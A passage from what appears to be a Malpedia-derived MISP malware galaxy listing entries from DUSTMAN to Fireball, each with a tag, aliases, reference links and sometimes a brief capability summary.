In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named "DUSTMAN" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim's network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack "DUSTMAN" after the filename and string embedded in the malware. "DUSTMAN" can be considered as a new variant of "ZeroCleare" malware, published in December 2019.

The tag is: *misp-galaxy:malpedia="DUSTMAN"*

DUSTMAN is also known as:

*Table 1680. Table References*

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<td><a href="https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html">https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html</a></td>
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**Duuzer**

The tag is: `misp-galaxy:malpedia="Duuzer"`

Duuzer is also known as:

- Escad

*Table 1681. Table References*

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<td><a href="https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group">https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-academy">https://www.secureworks.com/research/threat-profiles/nickel-academy</a></td>
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**DYEPACK**

The tag is: `misp-galaxy:malpedia="DYEPACK"`

DYEPACK is also known as:

- swift

*Table 1682. Table References*

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<td><a href="https://securelist.com/blog/sas/77908/lazarus-under-the-hood/">https://securelist.com/blog/sas/77908/lazarus-under-the-hood/</a></td>
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<tr>
<td><a href="https://github.com/649/APT38-DYEPACK">https://github.com/649/APT38-DYEPACK</a></td>
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**Dyre**

The tag is: `misp-galaxy:malpedia="Dyre"`

Dyre is also known as:

- Dyreza

*Table 1683. Table References*
**EASYNIGHT**

FireEye describes EASYNIGHT as a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.

Examples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case "printwin.dll!gzwrite64" (breaking the file signature).

The tag is: `misp-galaxy:malpedia="EASYNIGHT"`

EASYNIGHT is also known as:

*Table 1684. Table References*

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**EDA2**

The tag is: `misp-galaxy:malpedia="EDA2"`

EDA2 is also known as:

*Table 1685. Table References*
Egregor

The tag is: misp-galaxy:malpedia="Egregor"

Egregor is also known as:

Table 1686. Table References

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<td><a href="https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/">https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/">https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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**EHDevel**

The tag is: *misp-galaxy:malpedia="EHDevel"*

EHDevel is also known as:

*Table 1687. Table References*

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**ELECTRICFISH**

The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.

The tag is: *misp-galaxy:malpedia="ELECTRICFISH"*

ELECTRICFISH is also known as:

*Table 1688. Table References*

<table>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish">https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish</a></td>
</tr>
<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/AR19-129A">https://www.us-cert.gov/ncas/analysis-reports/AR19-129A</a></td>
</tr>
</tbody>
</table>

**ElectricPowder**

The tag is: *misp-galaxy:malpedia="ElectricPowder"*

ElectricPowder is also known as:

*Table 1689. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder">https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder</a></td>
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Elirks

The tag is: misp-galaxy:malpedia="Elirks"

Elirks is also known as:

Table 1690. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks">https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks</a></td>
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Elise

The tag is: misp-galaxy:malpedia="Elise"

Elise is also known as:

- EVILNEST

Table 1691. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.elise">https://malpedia.caad.fkie.fraunhofer.de/details/win.elise</a></td>
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<td><a href="https://www.joesecurity.org/blog/8409877569366580427">https://www.joesecurity.org/blog/8409877569366580427</a></td>
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<td><a href="https://securelist.com/blog/research/70726/the-spring-dragon-apt/">https://securelist.com/blog/research/70726/the-spring-dragon-apt/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-elgin">https://www.secureworks.com/research/threat-profiles/bronze-elgin</a></td>
</tr>
<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/">https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/</a></td>
</tr>
</tbody>
</table>
ELMER

ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.

The tag is: misp-galaxy:malpedia="ELMER"

ELMER is also known as:

• Elmost

Table 1692. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer">https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer</a></td>
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<td><a href="https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/">https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/</a></td>
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<td><a href="https://attack.mitre.org/software/S0064">https://attack.mitre.org/software/S0064</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></td>
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Emdivi

The tag is: misp-galaxy:malpedia="Emdivi"

Emdivi is also known as:

Table 1693. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi">https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi</a></td>
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**Emissary**

The tag is: `misp-galaxy:malpedia="Emissary"`

Emissary is also known as:

Table 1694. Table References

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</table>

**Emotet**

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.

The tag is: `misp-galaxy:malpedia="Emotet"`

Emotet is also known as:

- Geodo
- Heodo

Table 1695. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet">https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet</a></td>
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<td><a href="https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html">https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html</a></td>
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- [The Relationship Between Emotet, Ryuk, and Trickbot](https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/)
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- [Research Roundup Activity on Previously IdentifiedAPT33 Domains](https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/)
- [Reverse Engineering Emotet](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/)
- [Emotet Malware Now Steals Your Email Attachments to Attack Contacts](https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/)
- [Fantastic Payloads and Where We Find Them](https://intezero.com/blog/intezero-analyze/fantastic-payloads-and-where-we-find-them)
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- [Emotet Takedown 2021](https://intel471.com/blog/emotet-takedown-2021/)
- [Report Download](https://feodotracker.abuse.ch/?filter=version_e)
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- [Wireshark Tutorial: Emotet Infection](https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/)
- [Domain Parking](https://unit42.paloaltonetworks.com/domain-parking/)
- [The Many Faces of Emotet](https://spamauditor.org/2020/10/the-many-faces-of-emotet/)
Empire Downloader

The tag is: misp-galaxy:malpedia="Empire Downloader"

Empire Downloader is also known as:

Table 1696. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader</a></td>
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<td><a href="https://paper.seebug.org/1301/">https://paper.seebug.org/1301/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-275a">https://us-cert.cisa.gov/ncas/alerts/aa20-275a</a></td>
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<td><a href="https://twitter.com/thor_scanner/status/992036762515050496">https://twitter.com/thor_scanner/status/992036762515050496</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-firestone">https://www.secureworks.com/research/threat-profiles/bronze-firestone</a></td>
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Emudbot

Supposedly a worm that was active around 2012-2013.

The tag is: `misp-galaxy:malpedia="Emudbot"`

Emudbot is also known as:

Table 1697. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot</a></td>
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Enfal

The tag is: `misp-galaxy:malpedia="Enfal"`

Enfal is also known as:

- Lurid

Table 1698. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal">https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-palace">https://www.secureworks.com/research/threat-profiles/bronze-palace</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-union">https://www.secureworks.com/research/threat-profiles/bronze-union</a></td>
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Enviserv

The tag is: misp-galaxy:malpedia="Enviserv"

Enviserv is also known as:

Table 1699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.enviserv

EquationDrug

The tag is: misp-galaxy:malpedia="EquationDrug"

EquationDrug is also known as:

Table 1700. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug
https://securelist.com/inside-the-equationdrug-espionage-platform/69203/
https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ
http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html

Equationgroup (Sorting)

Rough collection EQGRP samples, to be sorted

The tag is: misp-galaxy:malpedia="Equationgroup (Sorting)"

Equationgroup (Sorting) is also known as:

Table 1701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup
https://laanwj.github.io/2016/08/28/feintcloud.html
https://laanwj.github.io/2016/08/22/blatsting.html
**Erebus (Windows)**

The tag is: `misp-galaxy:malpedia="Erebus (Windows)"`

Erebus (Windows) is also known as:

*Table 1702. Table References*

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</table>

**Eredel**

Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.

According to nulled[.]to:

Supported browsers Chromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.

- Stealing FileZilla
- Stealing an account from Telegram
- Stealing AutoFill
- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin
- Stealing files from the desktop. Supports any formats, configurable via telegram-bot

The tag is: `misp-galaxy:malpedia="Eredel"`

Eredel is also known as:

*Table 1703. Table References*

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Erica Ransomware

The tag is: `misp-galaxy:malpedia="Erica Ransomware"`

Erica Ransomware is also known as:

Table 1704. Table References

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Eris Ransomware

The tag is: `misp-galaxy:malpedia="Eris Ransomware"`

Eris Ransomware is also known as:

Table 1705. Table References

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EternalRocks

The tag is: `misp-galaxy:malpedia="EternalRocks"`

EternalRocks is also known as:

- MicroBotMassiveNet

Table 1706. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks">https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks</a></td>
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</table>
EternalPetya

The tag is: *misp-galaxy:malpedia=*EternalPetya*

EternalPetya is also known as:

- BadRabbit
- Diskcoder.C
- ExPetr
- NonPetya
- NotPetya
- Nyetya
- Petna
- Pnyetya
- nPetya

Table 1707. Table References

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<td><a href="https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/">https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-viking">https://www.secureworks.com/research/threat-profiles/iron-viking</a></td>
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<tr>
<td><a href="https://securelist.com/schroedingers-petya/78870/">https://securelist.com/schroedingers-petya/78870/</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/">https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/</a></td>
</tr>
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<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
</tr>
<tr>
<td><a href="https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4">https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/">https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/</a></td>
</tr>
<tr>
<td><a href="https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/">https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/</a></td>
</tr>
</tbody>
</table>

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EtumBot

The tag is: misp-galaxy:malpedia="EtumBot"

EtumBot is also known as:

- HighTide

Table 1708. Table References

Links

- [https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot](https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot)
- [https://www.secureworks.com/research/threat-profiles/bronze-globe](https://www.secureworks.com/research/threat-profiles/bronze-globe)

Evilbunny

The tag is: misp-galaxy:malpedia="Evilbunny"

Evilbunny is also known as:

Table 1709. Table References

Links

- [https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny](https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny)
**EvilGrab**

The tag is: `misp-galaxy:malpedia="EvilGrab"`

EvilGrab is also known as:

- Vidgrab

**EVILNUM (Windows)**

The tag is: `misp-galaxy:malpedia="EVILNUM (Windows)"`

**EvilPony**

Privately modded version of the Pony stealer.

The tag is: `misp-galaxy:malpedia="EvilPony"`
Evrial

The tag is: `misp-galaxy:malpedia="Evrial"`

Evrial is also known as:

Table 1713. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial">https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial</a></td>
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Exaramel (Windows)

The tag is: `misp-galaxy:malpedia="Exaramel (Windows)"`

Exaramel (Windows) is also known as:

Table 1714. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel">https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel</a></td>
</tr>
<tr>
<td><a href="https://www.wired.com/story/sandworm-centreon-russia-hack/">https://www.wired.com/story/sandworm-centreon-russia-hack/</a></td>
</tr>
</tbody>
</table>

Excalibur

The tag is: `misp-galaxy:malpedia="Excalibur"`

Excalibur is also known as:

- Saber
- Sabresac

Table 1715. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur">https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur</a></td>
</tr>
<tr>
<td><a href="https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies">https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies</a></td>
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</table>
**MS Exchange Tool**

The tag is: *misp-galaxy:malpedia="MS Exchange Tool"*

MS Exchange Tool is also known as:

*Table 1716. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool">https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool</a></td>
</tr>
<tr>
<td><a href="https://github.com/nccgroup/Royal_APT">https://github.com/nccgroup/Royal_APT</a></td>
</tr>
</tbody>
</table>

**Exile RAT**

ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.

The tag is: *misp-galaxy:malpedia="Exile RAT"*

Exile RAT is also known as:

*Table 1717. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat">https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat</a></td>
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**Exorcist Ransomware**

The tag is: *misp-galaxy:malpedia="Exorcist Ransomware"*

Exorcist Ransomware is also known as:

*Table 1718. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist">https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist</a></td>
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<tr>
<td><a href="https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81">https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81</a></td>
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**Xtreme RAT**

The tag is: *misp-galaxy:malpedia="Xtreme RAT"*

Xtreme RAT is also known as:
• ExtRat

Table 1719. Table References

Links

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat</a></td>
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<td><a href="https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1">https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/aluminum-saratoga">https://www.secureworks.com/research/threat-profiles/aluminum-saratoga</a></td>
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<tr>
<td><a href="https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html">https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html</a></td>
</tr>
<tr>
<td><a href="https://blogs.360.cn/post/APT-C-44.html">https://blogs.360.cn/post/APT-C-44.html</a></td>
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<td><a href="https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017">https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017</a></td>
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<td><a href="https://citizenlab.ca/2015/12/packrat-report/">https://citizenlab.ca/2015/12/packrat-report/</a></td>
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<td><a href="https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g">https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g</a></td>
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Eye Pyramid

The tag is: misp-galaxy:malpedia="Eye Pyramid"

Eye Pyramid is also known as:

Table 1720. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid">https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid</a></td>
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<tr>
<td><a href="http://blog.talosintel.com/2017/01/Eye-Pyramid.html">http://blog.talosintel.com/2017/01/Eye-Pyramid.html</a></td>
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<tr>
<td><a href="https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/">https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/</a></td>
</tr>
</tbody>
</table>

EYSservice

EYSservice is the main part of the backdoor used by Nazar APT. This is a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap.

The tag is: misp-galaxy:malpedia="EYSservice"

EYSservice is also known as:

Table 1721. Table References

Links
FakeRean

The tag is: misp-galaxy:malpedia="FakeRean"

FakeRean is also known as:

- Braviax

Table 1722. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean">https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean</a></td>
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<tr>
<td><a href="https://0x3asecurity.wordpress.com/2015/11/30/134260124544/">https://0x3asecurity.wordpress.com/2015/11/30/134260124544/</a></td>
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FakeTC

The tag is: misp-galaxy:malpedia="FakeTC"

FakeTC is also known as:

Table 1723. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc">https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc</a></td>
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<tr>
<td><a href="http://www.welivesecurity.com/2015/07/30/operation-potao-express/">http://www.welivesecurity.com/2015/07/30/operation-potao-express/</a></td>
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FakeWord

The tag is: misp-galaxy:malpedia="FakeWord"

FakeWord is also known as:
fancyfilter

FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.

The tag is: `misp-galaxy:malpedia="fancyfilter"`

fancyfilter is also known as:

- 0xFancyFilter

Fanny

The tag is: `misp-galaxy:malpedia="Fanny"`

Fanny is also known as:

- DEMENTIAWHEEL

FantomCrypt

The tag is: `misp-galaxy:malpedia="FantomCrypt"`
FantomCrypt is also known as:

Table 1727. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt</a></td>
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<td><a href="https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/">https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/</a></td>
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Farseer

The tag is: misp-galaxy:malpedia="Farseer"

Farseer is also known as:

Table 1728. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer">https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/">https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/">https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/</a></td>
</tr>
</tbody>
</table>

FastLoader

FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations.

The tag is: misp-galaxy:malpedia="FastLoader"

FastLoader is also known as:

Table 1729. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader</a></td>
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</table>

FastPOS

The tag is: misp-galaxy:malpedia="FastPOS"

FastPOS is also known as:

Table 1730. Table References
FatDuke

According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec. The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.

The tag is: misp-galaxy:malpedia="FatDuke"

FatDuke is also known as:

Table 1731. Table References

FCT Ransomware

The tag is: misp-galaxy:malpedia="FCT Ransomware"

FCT Ransomware is also known as:

Table 1732. Table References
Felismus

The tag is: misp-galaxy:malpedia="Felismus"

Felismus is also known as:

Table 1733. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus">https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus</a></td>
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</table>

Felixroot

The tag is: misp-galaxy:malpedia="Felixroot"

Felixroot is also known as:

Table 1734. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot">https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot</a></td>
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<tr>
<td><a href="https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257">https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257</a></td>
</tr>
</tbody>
</table>

Feodo

Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.

The tag is: misp-galaxy:malpedia="Feodo"

Feodo is also known as:

- Bugat
- Cridex

Table 1735. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo">https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo</a></td>
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Ficker Stealer

The tag is: misp-galaxy:malpedia="Ficker Stealer"

Ficker Stealer is also known as:

Table 1736. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer</a></td>
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<td><a href="https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a">https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/3xp0rtblog/status/1321209656774135810">https://twitter.com/3xp0rtblog/status/1321209656774135810</a></td>
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</table>

FileIce

The tag is: misp-galaxy:malpedia="FileIce"

FileIce is also known as:

Table 1737. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom</a></td>
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</table>

Filerase

Filerase is a .net API-based utility capable of propagating and recursively deleting files.

The tag is: misp-galaxy:malpedia="Filerase"

Filerase is also known as:

Table 1738. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase">https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase</a></td>
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**Final1stSpy**

The tag is: `misp-galaxy:malpedia="Final1stSpy"`

Final1stSpy is also known as:

Table 1739. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy">https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy</a></td>
</tr>
<tr>
<td><a href="https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/">https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/</a></td>
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</table>

**FindPOS**

The tag is: `misp-galaxy:malpedia="FindPOS"`

FindPOS is also known as:

- Poseidon

Table 1740. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos">https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos</a></td>
</tr>
<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/">https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/</a></td>
</tr>
<tr>
<td><a href="https://blogs.cisco.com/security/talos/poseidon">https://blogs.cisco.com/security/talos/poseidon</a></td>
</tr>
</tbody>
</table>

**FinFisher RAT**

FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.

The tag is: `misp-galaxy:malpedia="FinFisher RAT"`

FinFisher RAT is also known as:

- FinSpy
Table 1741. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.finisher">https://malpedia.caad.fkie.fraunhofer.de/details/win.finisher</a></td>
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<tr>
<td><a href="https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html">https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html</a></td>
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Fireball

The tag is: misp-galaxy:malpedia="Fireball"

Fireball is also known as:

Table 1742. Table References

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<tr>
